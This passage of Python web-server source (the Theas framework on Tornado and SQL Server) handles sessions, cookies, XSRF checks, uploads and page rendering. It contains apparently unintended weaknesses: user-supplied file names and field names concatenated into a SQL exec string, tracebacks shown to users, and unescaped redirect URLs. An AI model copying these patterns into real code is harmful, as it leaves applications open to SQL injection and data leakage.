self.log('Auth', 'Authenticated as AUTO (public)... not a real login')
else:
self.logged_in = True
# Store some user information (so the information can be accessed in templates)
self.username = username
self.user_token = user_token
if self.current_data:
# update data for template (in case Authenticate() was called at the request
# of a resource's stored procedure just before rendering the page)
self.current_data['_Theas']['UserName'] = self.username
self.current_data['_Theas']['LoggedIn'] = self.logged_in
self.current_data['_Theas']['UserToken'] = self.user_token
self.log('Auth', 'Authenticated as actual user {}'.format(self.username))
proc = None
del proc
except Exception as e:
self.logged_in = False
self.user_token = None
self.log('Session', 'Authentication failed:', e)
error_message = repr(e) + '|' + 'Invalid username or password.|1|Could Not Log In'
else:
self.logged_in = False
self.log('Session', 'Could not access SQL database server to attempt Authentication.')
error_message = 'Could not access SQL database server|Sorry, the server is not available right now|1|Cannot Log In'
if self.current_handler:
# If authentication was successful, we want to make sure the UserToken
# cookie is set properly. (If authentication was not successful,
# we make no changes to the UserToken cookie.)
self.current_handler.cookie_usertoken = None
if self.logged_in and self.remember_user_token:
self.current_handler.cookie_usertoken = self.user_token
# always write the cookie...even if authentication failed (in which case we need to clear it)
self.current_handler.write_cookies()
return self.logged_in, error_message
def logout(self):
self.log('Session', 'Logged out.')
self.release_lock(handler=self.current_handler)
self.logged_in = False
if self.sql_conn is not None and self.sql_conn.connected:
self.log('SQL', 'Closing SQL connection in ThSession.logout')
try:
self.sql_conn.cancel()
except Exception as e:
self.log('SQL', 'In ThSession.logout, exception calling sql_conn.cancel(). {}'.format(e))
finally:
self.log('SQL', 'Call to cancel() on SQL connection complete')
try:
proc = ThStoredProc('theas.spdoLogout', self)
if proc.is_ok:
proc.bind(self.session_token, _mssql.SQLVARCHAR, '@SessionToken')
proc.execute()
except Exception as e:
self.log('SQL', 'In ThSession.logout, exception calling theas.spdoLogout. {}'.format(e))
try:
self.sql_conn.close()
self.sql_conn = None
except Exception as e:
self.log('SQL', 'In ThSession.logout, exception calling sql_conn.close(). {}'.format(e))
finally:
self.log('SQL', 'In ThSession.logout, call to close() on SQL connection complete')
def clientside_redir(self, url=None, action='get'):
# Returns a tiny HTML document sent to the browser that causes it to redirect (GET) or post back (POST) to the given URL.
if not url:
if self.bookmark_url:
url = self.bookmark_url
self.bookmark_url = None
elif self.current_resource and self.current_resource.resource_code:
url = self.current_resource.resource_code
else:
url = '/'
if action == 'get':
buf = '''<!doctype html>
<html>
<head>
<script>window.location = "{action}";</script>
</head>
<body>
</body>
</html>'''
buf = buf.format(action=url)
else:
buf = '''<!doctype html>
<html>
<body>
<form id="frmBounce" method="POST" action="{action}" onSubmit="noDef();">
<input type="hidden" name={session_cookie_name} value="{session_token}"/>
{xsrf}
</form>
<script>
function noDef(e) {{
if (!e) {{
e = window.event;
}}
if (e.preventDefault) {{
e.preventDefault();
}}
if (e.stopPropagation) {{
// IE9 & Other Browsers
e.stopPropagation();
}}
else {{
// IE8 and Lower
e.cancelBubble = true;
}}
}}
document.getElementById("frmBounce").submit();
</script>
</body>
</html>'''
buf = buf.format(action=url, session_token=self.session_token,
xsrf=self.current_handler.xsrf_form_html(),
session_cookie_name=SESSION_COOKIE_NAME)
return buf
def do_on_sql_start(self, proc):
self.date_last_sql_start = time.time()
self.date_sql_timeout = datetime.datetime.now() + datetime.timedelta(seconds=G_program_options.sql_timeout)
self.log('Timing', 'SQL Start for procedure: ', proc.stored_proc_name)
self.log('Timing', 'SQL execution times out at:', self.date_sql_timeout)
def do_on_sql_done(self, proc):
now = time.time()
self.date_last_sql_done = now
self.date_sql_timeout = None
elapsed = (now - self.date_last_sql_start) * 1000 if self.date_last_sql_start is not None else 0
self.log('Timing', 'SQL Done. Duration: {:.2f}ms'.format(elapsed))
def init_template_data(self):
this_data = {}
this_data['_Theas'] = {}
#this_data['_Theas']['ST'] = self.session_token
this_data['_Theas']['UserName'] = self.username
this_data['_Theas']['LoggedIn'] = self.logged_in
#this_data['_Theas']['UserToken'] = self.user_token
if self.current_handler is not None:
this_data['_Theas']['xsrf_token'] = self.current_handler.xsrf_token.decode('ascii')
this_data['_Theas']['__handler_guid'] = self.current_handler.handler_guid
this_data['_Theas']['theasServerPrefix'] = G_program_options.server_prefix
# this_data['_Theas']['xsrf_formHTML'] = self.current_handler.xsrf_form_html()
this_data['_Theas']['theasParams'] = self.theas_page.get_controls()
if self.current_resource is not None:
this_data['_Theas']['theasCurrentPage'] = self.current_resource.resource_code
this_data['_Theas']['theasIncludes'] = G_cached_resources.static_blocks_dict
this_data['_Theas']['theasJS'] = 'Theas.js'
now_time = datetime.datetime.now().strftime("%I:%M%p")
this_data['_Theas']['Now'] = now_time
# Note: if an APIStoredProc is called, data._resultsetMeta will be added,
# but we do not add this dictionary here during initialization
# this_data['_resultsetMeta'] = {}
self.current_data = this_data
return this_data
def build_login_screen(self):
global G_cached_resources
self.log('Response', 'Building login screen')
buf = '<html><body>No data in build_login_screen</body></html>'
resource = None
template_str = ''
self.log('Resource', 'Fetching login page resource')
resource = G_cached_resources.get_resource(LOGIN_RESOURCE_CODE, self)
if resource is None:
# raise Exception ('Could not load login screen template from the database. Empty template returned from call to theas.spgetSysWebResources.')
buf = '<html><head><meta http-equiv="refresh" content="30"></meta><body>Could not load login screen template from the database server. Empty template returned from call to theas.spgetSysWebResources.<br /><br />Will try again shortly... </body></html>'
else:
template_str = resource.data
this_data = self.init_template_data()
buf = self.theas_page.render(template_str, data=this_data)
return buf
# -------------------------------------------------
# ThResponseInfo
# -------------------------------------------------
class ThResponseInfo:
def __init__(self):
self.current_date = None
self.date_updated = None
self.expires = None
self.content_length = None
self.cache_control = None
self.content_type = None
self.content_filename = None
self.etag = None
# -------------------------------------------------
# ThHandler main request handler
# -------------------------------------------------
class ThHandler(tornado.web.RequestHandler):
executor = ThreadPoolExecutor(max_workers=MAX_WORKERS)
def __init__(self, application, request, **kwargs):
super().__init__(application, request, **kwargs)
self.session = None
self.handler_guid = str(uuid.uuid4())
self.deferred_xsrf = False
self.set_header('Server', 'Theas/{}'.format(THEAS_VERSION))
self.filename = None
self.__cookies_changed = False
self.__cookie_st = None
self.__cookie_usertoken = None
# Retrieve session and user token cookie values and save
# them in the new session in __cookie_st and __cookie_usertoken
self.retrieve_cookies()
def __del__(self):
self.session = None
@property
def cookie_st(self):
return self.__cookie_st
@cookie_st.setter
def cookie_st(self, new_val):
if new_val == '':
new_val = None
if self.__cookie_st != new_val:
self.__cookie_st = new_val
self.cookies_changed = True
@property
def cookie_usertoken(self):
return self.__cookie_usertoken
@cookie_usertoken.setter
def cookie_usertoken(self, new_val):
if self.__cookie_usertoken != (None if new_val == '' else new_val):
self.__cookie_usertoken = new_val
self.cookies_changed = True
@property
def cookies_changed(self):
return self.__cookies_changed
@cookies_changed.setter
def cookies_changed(self, new_val):
if self.__cookies_changed != new_val:
ThSession.cls_log('Cookies', 'Flag cookies_changed set to {}'.format(new_val))
self.__cookies_changed = new_val
def get_response_info(self, resource_code, th_session, sessionless=False):
'''
Determine response length and content type. Used for HEAD requests.
:param resource_code: code of the resource for which response info is needed
:param th_session: session to use for the SQL call (may be None when sessionless is True)
:param sessionless: if True and th_session is None, a temporary sessionless ThSession is created
:return: ThResponseInfo populated from theas.spgetResponseInfo
'''
# load resource from database
if th_session is None:
if not sessionless:
assert th_session is not None, 'ThHandler: get_response_info called without a valid session'
else:
th_session = ThSession(None, sessionless=True)
# Get stored proc theas.spgetResponseInfo
this_proc = ThStoredProc('theas.spgetResponseInfo', th_session)
if this_proc.is_ok:
this_proc.bind(resource_code, _mssql.SQLCHAR, '@ResourceCode', null=(resource_code is None))
proc_result = this_proc.execute(fetch_rows=False)
assert proc_result, 'ThHandler: get_response_info received error result from call to theas.spgetResponseInfo in the SQL database.'
response_info = ThResponseInfo()
row_count = 0
self.set_header('Server', 'theas')
th_session = None
if this_proc.th_session.sql_conn is not None:
for row in this_proc.th_session.sql_conn:
# note: should only be one row
row_count += 1
response_info.current_date = row['CurrentDate']
response_info.date_updated = row['DateUpdated']
response_info.content_length = row['ContentLength']
response_info.cache_control = row['CacheControl']
response_info.content_type = row['ContentType']
response_info.content_filename = row['ContentFilename']
response_info.expires = row['ContentExpires']
response_info.etag = row['Etag']
this_proc = None
del this_proc
return response_info
def retrieve_cookies(self):
self.__cookie_st = None
self.__cookie_usertoken = None
orig_cookie = self.get_secure_cookie(SESSION_COOKIE_NAME)
if orig_cookie is not None and orig_cookie != b'':
self.__cookie_st = orig_cookie.decode(encoding='ascii')
else:
self.__cookie_st = self.get_cookie(SESSION_COOKIE_NAME)
orig_cookie = self.get_secure_cookie(USER_COOKIE_NAME)
if orig_cookie is not None and orig_cookie != b'':
self.__cookie_usertoken = orig_cookie.decode(encoding='ascii')
else:
self.__cookie_usertoken = self.get_cookie(USER_COOKIE_NAME)
#else:
# self.current_handler.cookie_st = None
# self.current_handler.write_cookies()
# self.log('Cookies',
# 'Cleared cookie {} because USE_SESSION_COOKIE is not true'.format(SESSION_COOKIE_NAME))
def write_cookies(self):
if self.cookie_st is None or len(self.cookie_st) == 0:
self.clear_cookie(SESSION_COOKIE_NAME, path='/')
else:
if USE_SECURE_COOKIES:
self.set_secure_cookie(SESSION_COOKIE_NAME, self.cookie_st, path='/')
else:
self.set_cookie(SESSION_COOKIE_NAME, self.cookie_st, path='/')
if self.cookie_usertoken is None or len(self.cookie_usertoken) == 0:
self.clear_cookie(USER_COOKIE_NAME, path='/')
else:
if USE_SECURE_COOKIES:
self.set_secure_cookie(USER_COOKIE_NAME, self.cookie_usertoken, path='/')
else:
self.set_cookie(USER_COOKIE_NAME, self.cookie_usertoken, path='/')
def check_xsrf_cookie(self):
"""
Normally we want to allow Tornado to validate XSRF tokens as normal. However
certain special resources (such as those that must accept a form post form an
external site that does not have access to the XSRF token) may allow for XSRF
token validation to be disabled.
Since XSRF checking is performed by Torndao before the request is processed,
the caller must indicate that XRSF checking is to be skipped by providing
skipXSRF=1 (in either a query string parameter or form field). However,
if skipXSRF=1, an error will be raised later when processing the request if
the resource's skip_xsrf flag is not set. (In other words, in order for XSRF
checking to be skiped, the requestor must indicate skipXSRF=1 AND the resource
must be configured to accept SkipXSRF as well.)
"""
if self.get_argument('skipXSRF', default='0') == '1':
self.deferred_xsrf = True
# since we are skipping XSRF validation we can't trust the session cookie
self.cookie_st = None
self.cookie_usertoken = None
self.write_cookies()
ThSession.cls_log('Cookies',
'Cleared cookies {} and theas:th:UsersToken due to skipXSRF'.format(SESSION_COOKIE_NAME))
return True
else:
xsrf_ok = False
xsrf_message = ''
try:
tornado.web.RequestHandler.check_xsrf_cookie(self)
xsrf_ok = True
except Exception as e:
# Tornado normally just raises an exception, such as:
# raise HTTPError(403, "'_xsrf' argument missing from POST")
xsrf_ok = False
xsrf_message = str(e)
if not xsrf_ok:
ThSession.cls_log('xsrf', xsrf_message)
self.send_error(status_code=403, message=xsrf_message)
def write_error(self, status_code, **kwargs):
global G_program_options
buf = '<html><body>Unhandled error in ThHandler</body></html>'
try:
this_err_cls = None
this_err = ''
this_trackback = None
lines = []
if 'exc_info' in kwargs:
this_err_cls, this_err, this_trackback = kwargs['exc_info']
if not this_err and 'message' in kwargs:
this_err = kwargs['message']
if status_code == 404:
buf = '<html><body>Error 404: File not found</body></html>'
else:
if 'exc_info' in kwargs:
for line in traceback.format_exception(this_err_cls, this_err, this_trackback):
lines.append(line)
buf = '<html><body><p>Sorry, but you encountered an error at {}.</p>' \
'<p>Click <a href="{}">here</a> to log in and try again.</p>' \
'<p>{}</p><p>{}</p></body></html>'
buf = buf.format(
str(datetime.datetime.now()),
G_program_options.server_prefix + '/logout',
str(this_err),
str(lines)
)
finally:
self.write(buf)
self.finish()
if self.session is not None:
self.session.finished()
def process_uploaded_files(self):
def process_file(bindata=None, filename=None, file_obj=None, fieldname=None, filetype=None):
buf = None
if bindata is not None:
buf = '0x' + binascii.hexlify(bindata).decode('ascii')
elif file_obj is not None:
buf = '0x' + binascii.hexlify(file_obj['body']).decode('ascii')
filename = file_obj['filename']
filetype = file_obj['content_type']
# fileProc = ThStoredProc('theas.spinsHTTPFiles', self.session)
# if fileProc.is_ok:
# if bindata is not None:
# buf = '0x' + binascii.hexlify(bindata).decode('ascii')
# filename = 'body'
# else:
# buf = '0x'.encode('ascii') + binascii.hexlify(file_obj['body']).decode('ascii')
# filename = this_file['filename']
# fileProc.bind(fieldname, _mssql.SQLVARCHAR, '@FieldName')
# fileProc.bind(this_filename, _mssql.SQLVARCHAR, '@FileName')
# fileProc.bind(buf, _mssql.SQLVARCHAR, '@FileCharData')
# should work, but does not: #fileProc.bind(this_file['body'], _mssql.SQLVARBINARY, '@FileData')
# fileResultValue = fileProc.execute()
# callproc() is broken as of 6/16/2015, in that it truncates long values:
# https://github.com/pymssql/pymssql/issues/275
# So we are forced to use execute instead
sql_str = "exec theas.spinsHTTPFiles @FieldName={this_fieldname}, @FileName={this_filename}, @FileType={this_filetype}, @FileData={this_filedata}".format(
this_fieldname='\'' + fieldname + '\'' if fieldname else 'NULL',
this_filename='\'' + filename + '\'' if filename else 'NULL',
this_filetype='\'' + filetype + '\'' if filetype else 'NULL',
this_filedata=buf if buf else 'NULL'
)
self.session.sql_conn.execute_non_query(sql_str)
if self.session.sql_conn is None or not self.session.sql_conn.connected:
self.session.log('POST Files', 'process_uploaded_files:', 'New connection')
self.session.init_session()
if self.request.headers.get('Content-Type') == 'application/octet-stream':
self.session.log('POST Files', 'Delivering binary body to SQL')
process_file(bindata=self.request.body,
filename=self.request.headers.get('X-File-Name'),
filetype=self.request.headers.get('X-File-Type')
)
if len(self.request.files) > 0:
self.session.log('POST Files', 'Delivering upload files to SQL')
# pass upload files to SQL
for this_file_field in list(self.request.files.keys()):
for this_file in self.request.files[this_file_field]:
process_file(file_obj=this_file, fieldname=this_file_field)
def get_template(self, resource_code):
global G_cached_resources
global G_program_options
# Get template
template_str = None
resultset_str = None
resource = None
self.session.log('Resource', 'Fetching resource ', resource_code)
resource = G_cached_resources.get_resource(resource_code, self.session)
if resource is None:
if template_str is None:
msg = 'Could not load {} from the database. '.format(
'default template' if resource_code is None else 'template "{}"'.format(resource_code)
) + ' Probably this user is not configured to use this server.' + \
'<p>Click <a href="{}">here</a> to log in and try again.</p>'.format(
G_program_options.server_prefix + '/logout')
template_str = '<html><body>' + msg + '</body></html>'
else:
template_str = resource.data
if resource is not None and resource.exists and resource.resource_code != LOGIN_RESOURCE_CODE and \
resource.render_jinja_template and self.session.current_resource != resource:
# We may have retrieved a cached resource. Set current_resource.
self.session.current_resource = resource
self.session.current_template_str = template_str
if template_str is None or len(template_str) == 0:
msg = 'Could not load {} from the database. '.format(
'default template' if resource_code is None else 'template "{}"'.format(resource_code)
) + ' Empty template was returned.' + \
'<p>Click <a href="{}">here</a> to log in and try again.</p>'.format(
G_program_options.server_prefix + '/logout')
template_str = '<html><body>' + msg + '</body></html>'
return template_str, resource
def get_data(self, resource, suppress_resultsets=False):
# Get actual quest data
had_error = False
self.session.comments = 'ThHandler.get_data'
# Always initialize data--even if there is no APIStoredProc to call.
# This way a Jinja template can always access data._Theas
this_data = self.session.init_template_data()
# serialize form parameters (excluding theas: parameters) to pass into the stored procedure
form_params = self.request.body_arguments
form_params_str = ''
for key in form_params:
if not key.startswith('theas:'):
this_val = form_params[key]
if isinstance(this_val, list) and len(this_val) > 0:
this_val = this_val[0]
if isinstance(this_val, bytes):
this_val = this_val.decode('utf-8')
elif this_val:
this_val = str(this_val)
form_params_str = form_params_str + key + '=' + urlparse.unquote(this_val) + '&'
# serialize theas paramters to pass into the stored procedure
theas_params_str = self.session.theas_page.serialize()
proc = None
if resource and resource.api_stored_proc:
proc = ThStoredProc(resource.api_stored_proc, self.session)
try:
if proc.is_ok:
try:
proc.refresh_parameter_list()
except:
self.session.logout()
raise
# if '@QuestGUID' in proc.parameter_list and self.session.theas_page.get_value('questGUID') is not None:
# proc.bind(self.session.theas_page.get_value('questGUID'), _mssql.SQLCHAR, '@QuestGUID')
# if '@StepGUID' in proc.parameter_list and self.session.theas_page.get_value('stepGUID') is not None:
# proc.bind(self.session.theas_page.get_value('stepGUID'), _mssql.SQLCHAR, '@StepGUID')
# if '@StepDefID' in proc.parameter_list and self.session.theas_page.get_value('stepDefID') is not None:
# proc.bind(self.session.theas_page.get_value('stepDefID'), _mssql.SQLCHAR, '@StepDefID')
first_path_elem = self.request.path.split('/')[1]
if '@Document' in proc.parameter_list:
this_document = None
if first_path_elem == 'r':
this_document = self.request.path.split('/')[2]
else:
this_document = self.request.path
if this_document is not None:
proc.bind(this_document, _mssql.SQLCHAR, '@Document')
if '@PathFull' in proc.parameter_list:
proc.bind(self.request.path, _mssql.SQLCHAR, '@PathFull')
if '@PathParams' in proc.parameter_list:
this_path = None
if first_path_elem == 'r':
this_path = "/".join(self.request.path.split('/')[3:])
if this_path is not None:
proc.bind(this_path, _mssql.SQLCHAR, '@PathParams')
if '@HTTPParams' in proc.parameter_list:
proc.bind(self.request.query, _mssql.SQLCHAR, '@HTTPParams')
if '@FormParams' in proc.parameter_list:
proc.bind(form_params_str, _mssql.SQLCHAR, '@FormParams')
# proc.bind(urlparse.urlencode(self.request.body_arguments, doseq=True), _mssql.SQLCHAR, '@FormParams')
if '@HTTPHeaders' in proc.parameter_list:
headers_str = ''
this_dict = dict(self.request.headers)
for key in this_dict:
this_val = this_dict[key]
if isinstance(this_val, list) and len(this_val) > 0:
this_val = this_val[0]
if isinstance(this_val, bytes):
this_val = this_val.decode('utf-8')
elif this_val:
this_val = str(this_val)
headers_str = headers_str + '&' + key + '=' + urlparse.quote(this_val)
proc.bind(headers_str, _mssql.SQLCHAR, '@HTTPHeaders')
if '@TheasParams' in proc.parameter_list:
# proc.bind(theas_params_str, _mssql.SQLCHAR, '@TheasParams', output=proc.parameter_list['@TheasParams']['is_output'])
# Would prefer to use output parameter, but this seems not to be supported by FreeTDS. So
# we look to the resultest(s) returned by the stored proc instead.
proc.bind(theas_params_str, _mssql.SQLCHAR, '@TheasParams')
if '@SuppressResultsets' in proc.parameter_list:
proc.bind(str(int(suppress_resultsets)), _mssql.SQLCHAR, '@SuppressResultsets')
# Execute stored procedure
proc_result = proc.execute(fetch_rows=False)
except Exception as e:
had_error = True
# err_msg = self.format_error(e)
err_msg = e.text.decode('ascii')
self.session.theas_page.set_value('theas:th:ErrorMessage', '{}'.format(urlparse.quote(err_msg)))
# if not suppress_resultsets:
if not had_error:
# The stored procedure may return one or more resultsets.
# Resultsets may return a single row--most appropriately stored in a dictionary, or may contain many rows--most
# appropriately stored in a list of dictionaries.
#
# For a single-row resultset stored in a dictionary, values can be accessed as:
# this_data['General']['MO_Number']
#
# For multi-row resultsets stored in a list of dictionaries, values can be accessed while looping through the
# list of rows (dictionaries), or for a particular row in the list, such as:
# this_data['rows'][0]['MO_Number']
#
# resultsetStr contains a string of multiple lines, such as:
# resultset1
# resultset2:Field1,Field2,Field3
#
# Each line in resultsetStr indicates a resultset. If a : is present, this indicates a delimiter to a
# list of a subset of the list of fields contained in the resultset. This is to make it easy to control
# the columns from a resultset that will be displayed, without hard-coding fields into a template.
# Since we did call APIStoredProc to get data, add data._resultsetMeta
this_data['_resultsetMeta'] = {}
redirect_to = None
history_go_back = False
perform_authenticate_existing = False
resultset_list = []
resultset_strs = resource.api_stored_proc_resultset_str.splitlines()
self.session.log('SQL', 'Expecting ' + str(len(resultset_strs)) + ' resultsets')
# resultset_str is in the form:
# MyResultsetName:{max_rows}:{column1,column2}
# {max_rows} is optional. If present, will be an integer. If equals 1, resultset will be stored in a
# simple dictionary (not in a list of dictionaries). If < 1, value is ignored. If > 1, value limits
# the number of rows stored in data passed to the template.
# {column1,column2} is optional. If present, will be a comma-separated list of column names. This list
# will be used instead of the list of all columns returned in the resultset. (i.e. will limit the
# columns stored in the data passed to the template)
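# For example (hypothetical values), a line of "General:1:MO_Number,Quantity" names the resultset
# "General", stores its single row as a dictionary, and keeps only the two listed columns.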
this_resultset_info = {}
for resultset_str in resultset_strs:
this_resultset_fields = resultset_str.split(':')
this_resultset_info = {}
this_resultset_info['name'] = this_resultset_fields[0]
this_resultset_info['max_rows'] = None
this_data['_session'] = self.session
this_data['_resultsetMeta'][this_resultset_fields[0]] = {}
if len(this_resultset_fields) > 1:
collist_index = 1
if this_resultset_fields[1].isnumeric():
this_resultset_info['max_rows'] = int(this_resultset_fields[1])
collist_index = 2
if len(this_resultset_fields) > collist_index:
this_data['_resultsetMeta'][this_resultset_fields[0]]['columns'] = this_resultset_fields[
collist_index].split(',')
this_resultset_info['columns'] = this_data['_resultsetMeta'][this_resultset_fields[0]][
'columns']
resultset_list.append(this_resultset_info)
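# Walk each expected resultset in order, pulling rows from the open SQL connection and
# advancing with nextresult() until the resultsets are exhausted.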
row = None
for this_resultset_info in resultset_list:
max_rows = this_resultset_info['max_rows']
if max_rows is None:
max_rows = 0
if max_rows == 1:
this_data[this_resultset_info['name']] = {}
else:
this_data[this_resultset_info['name']] = []
resultset = [row for row in self.session.sql_conn]
row_count = 0
for row in resultset:
row_count += 1
if (max_rows > 1) and (row_count > max_rows):
break
else:
if this_resultset_info['max_rows'] == 1:
this_data[this_resultset_info['name']] = row
else:
this_data[this_resultset_info['name']].append(row)
self.session.log('SQL', 'Processed {} row(s) in resultset {}'.format(
len(this_data[this_resultset_info['name']])
if isinstance(this_data[this_resultset_info['name']], list) else 1,
this_resultset_info['name'])
)
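# The 'General' resultset is expected to be a single row carrying page/session control data
# (TheasParams, ErrorMessage, Cookies, RedirectTo, DoHistoryGoBack, Filename, HTTPHeaders).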
if this_resultset_info['name'] in ('General',):  # should we also include 'general' here??
if row is not None:
if 'TheasParams' in row:
theas_params_str = row['TheasParams']
if theas_params_str:
# Incorporate any Theas control changes from SQL, so these values can be used
# when rendering the template.
self.session.theas_page.process_client_request(buf=theas_params_str, accept_any=True,
from_stored_proc=True)
if theas_params_str.find('th:LoggedIn=') >= 0:
# Stored procedure is indicating authentication status changed. Retrieve
# current session info.
perform_authenticate_existing = True
# Since Theas controls may have changed, update the copy in data._Theas
this_data['_Theas']['theasParams'] = self.session.theas_page.get_controls()
if 'ErrorMessage' in row:
if not row['ErrorMessage'] is None and row['ErrorMessage'] != '':
self.session.theas_page.set_value('theas:th:ErrorMessage', row['ErrorMessage'])
if 'Cookies' in row:
cookies_str = row['Cookies']
# Cookies returns a string like name1=value1&name2=value2...
if cookies_str:
for this_pair in cookies_str.split('&'):
this_name, this_value = this_pair.split('=', 1)
if this_name == SESSION_COOKIE_NAME:
self.cookie_st = this_value
elif this_name == USER_COOKIE_NAME:
self.cookie_usertoken = this_value
else:
self.clear_cookie(this_name, path='/')
self.set_cookie(this_name, this_value, path='/')
self.write_cookies()
self.session.log('Cookies', 'Updating cookies as per stored procedure E')
self.cookies_changed = True
# Check to see if stored proc indicates we should redirect
if 'RedirectTo' in row:
redirect_to = row['RedirectTo']
# Check to see if stored proc indicates we should go back in history
if 'DoHistoryGoBack' in row:
if str(row['DoHistoryGoBack']) == '1':
history_go_back = True
if 'Filename' in row:
self.filename = row['Filename']
if 'HTTPHeaders' in row:
header_str = row['HTTPHeaders']
# HTTPHeaders returns a string like name1=value1&name2=value2...
if header_str:
for this_pair in header_str.split('&'):
this_name, this_value = this_pair.split('=', 1)
self.set_header(this_name, this_value)
self.session.log('Headers', 'Updating HTTP headers as per stored procedure E')
have_next_resultset = self.session.sql_conn.nextresult()
if not have_next_resultset:
break
# stored proc may have updated Theas controls, so update the copy in data._Theas
# this_data['_Theas']['theasParams'] = self.session.theas_page.get_controls()
# One of our stored procedure resultsets indicated that authentication had been performed.
# Have the session retrieve existing authentication from the database.
if perform_authenticate_existing:
self.session.log('Auth', 'Authenticating due to resource stored proc th:LoggedIn')
self.session.authenticate(retrieve_existing=True)
self.session.comments = None
return this_data, redirect_to, history_go_back
else:
self.session.comments = None
return None, None, None
@run_on_executor
def get_data_background(self, resource, suppress_resultsets=False):
return self.get_data(resource, suppress_resultsets=suppress_resultsets)
@run_on_executor
def authenticate_user_background(self, u, pw):
return self.session.authenticate(username=u, password=pw)
@run_on_executor
def build_login_screen_background(self):
return self.session.build_login_screen()
def do_render_response(self, this_resource=None):
# Gets data and renders template. Used by GET only.
# Note that this method will be called whenever the resource indicates that there is an APIStoredProc,
# even if a Jinja template is not actually used.
buf = None
this_data = None
redirect_to = None
history_go_back = False
if this_resource is not None:
if this_resource.api_stored_proc or this_resource.render_jinja_template:
this_data, redirect_to, history_go_back = self.get_data(this_resource)
if this_resource.render_jinja_template:
# resource indicates that we should render a Jinja template
buf = self.session.theas_page.render(this_resource.data, data=this_data)
elif this_resource.api_stored_proc:
# resource does not indicate that we should render a Jinja template (but does specify an
# api stored proc) so just return the raw content retrieved by get_data
if not self.session.theas_page.get_value('theas:th:ErrorMessage') and \
'General' in this_data and \
'Content' in this_data['General']:
buf = this_data['General']['Content']
return buf, redirect_to, history_go_back
@run_on_executor
def do_render_response_background(self, this_resource=None):
return self.do_render_response(this_resource=this_resource)
# @run_on_executor
# def get_resource_background(self, resource_code, th_session, for_public_use=False, all_static_blocks=False, none_if_not_found=True, from_file=None):
# global G_cached_resources
# return G_cached_resources.get_resource(resource_code, th_session, for_public_use=for_public_use, all_static_blocks=all_static_blocks, none_if_not_found=none_if_not_found, from_file=from_file)
# Background disabled
def get_resource_background(self, resource_code, th_session, for_public_use=False, all_static_blocks=False,
none_if_not_found=True, from_file=None):
return G_cached_resources.get_resource(resource_code, th_session, for_public_use=for_public_use,
all_static_blocks=all_static_blocks,
none_if_not_found=none_if_not_found, from_file=from_file)
def do_post(self, *args, **kwargs):
handled = False
# Do everything that is needed to process an HTTP post on an authenticated session
buf = None # we return buf to the caller
redirect_to = None
history_go_back = False
this_data = None
this_page = None
next_page = None
next_page_query = None
self.session.theas_page.process_client_request(request_handler=self, accept_any=False)
self.process_uploaded_files()
# self.session.theas_page.controls['ctrlinputHelloWorld'].value = self.get_body_argument('theasParams', 'NONE')
if self.get_argument('DoHistoryGoBack', default='0') == '1':
history_go_back = True
cmd = None
if self.get_arguments('cmd'):
cmd = self.get_argument('cmd')
if not cmd and self.get_body_arguments('cmd'):
cmd = self.get_body_argument('cmd')
# this_page = self.session.theas_page.get_value('th:CurrentPage')
# if not this_page:
this_page = self.request.path.rsplit('/', 1)[1]
if '?' in this_page:
this_page = this_page[:this_page.find('?')]
# if self.session.current_resource and this_page == self.session.current_resource.resource_code:
# pass
# else:
# Browser provided a different value for current_page. Perhaps the user used the back button?
# In any case, we want to use the correct stored procedure for this request. Getting the template
# will set that from us.
template_str, this_resource = self.get_template(this_page)
if self.deferred_xsrf:
self.session.theas_page.set_value('th:PerformUpdate', '1')
if cmd is not None:
pass
buf = '<html><body>Parameter cmd provided, but not implemented.</body></html>'
else:
if self.session.theas_page.get_value('th:PerformUpdate') == '1':
# Before we can process next_page, we need to submit to process this_page post
self.session.log('Data', 'Performing update of posted data')
if self.session and self.session.current_resource:
this_data, redirect_to, history_go_back = \
self.get_data(self.session.current_resource, suppress_resultsets=True)
self.session.theas_page.set_value('th:PerformUpdate', '0')
# determine what page is being requested
next_page = self.session.theas_page.get_value('th:NextPage')
if next_page in ('None', 'default', 'index'):
next_page = DEFAULT_RESOURCE_CODE
if not next_page:
next_page = this_page
if redirect_to:
self.session.log('Nav', 'PerformUpdate stored proc sent redirect to {}'.format(redirect_to))
else:
self.session.log('Nav', 'After PerformUpdate stored proc th:NextPage={}'.format(next_page))
# Force a redirect
redirect_to = next_page
# Perform redirect after processing the post (i.e. Post-Redirect-Get PRG) pattern
# Redir will be to redirect_to if set, else will be to next_page.
# This is true even if FORCE_REDIR_AFTER_POST == False, because th:PerformUpdate == 1
if redirect_to:
pass
else:
# determine what page is being requested
next_page = self.session.theas_page.get_value('th:NextPage')
if next_page and '?' in next_page:
next_page = next_page[:next_page.find('?')]
if next_page in ('None', 'default', 'index'):
next_page = DEFAULT_RESOURCE_CODE
if not next_page:
next_page = this_page
if FORCE_REDIR_AFTER_POST:
# We want to force a redirect even if next_page == this_page because this request
# is a POST, and we only want to serve up content on a GET
redirect_to = next_page
if not redirect_to:
self.session.log('Nav', 'Before processing for POST th:NextPage={}'.format(next_page))
if not self.session.current_resource or next_page != self.session.current_template_str:
template_str, this_resource = self.get_template(next_page)
else:
this_resource = self.session.current_resource
# if not self.deferred_xsrf, then XSRF token has already been validated by Tornado
xsrf_ok = not self.deferred_xsrf
xsrf_message = ''
if not xsrf_ok:
# XSRF token has not yet been validated
if this_resource is not None and this_resource.skip_xsrf:
# resource indicates that XSRF token validation is not needed
xsrf_ok = True
else:
# resource indicates that XSRF token validation is required...so do it now
try:
tornado.web.RequestHandler.check_xsrf_cookie(self)
xsrf_ok = True
except Exception as e:
# Tornado normally just raises an exception, such as:
# raise HTTPError(403, "'_xsrf' argument missing from POST")
xsrf_ok = False
xsrf_message = str(e)
if not xsrf_ok:
ThSession.cls_log('xsrf', xsrf_message)
self.send_error(status_code=403, message=xsrf_message)
handled = True
else:
if this_resource is not None:
if this_resource.requires_authentication and not self.session.logged_in:
self.session.log('Auth', 'Resource requires auth and user not logged in')
# still not logged in: present login screen
self.session.bookmark_url = this_resource.resource_code
buf = self.session.build_login_screen()
self.session.log('Auth', 'Sending login screen')
else:
if this_resource.on_before:
this_function = getattr(TheasCustom, this_resource.on_before)
if this_function is not None:
handled = this_function(self, args, kwargs)
if not handled and not history_go_back and self.session is not None:
# render output using template and data
if this_resource and this_resource.api_stored_proc:
self.session.log('Data', 'Calling get_data')
this_data, redirect_to, history_go_back = self.get_data(this_resource)
if this_resource and this_resource.render_jinja_template and redirect_to is None and not history_go_back:
self.session.log('Render', 'Calling theas_page.render')
buf = self.session.theas_page.render(template_str, data=this_data)
self.session.log('Render', 'Done with theas_page.render')
else:
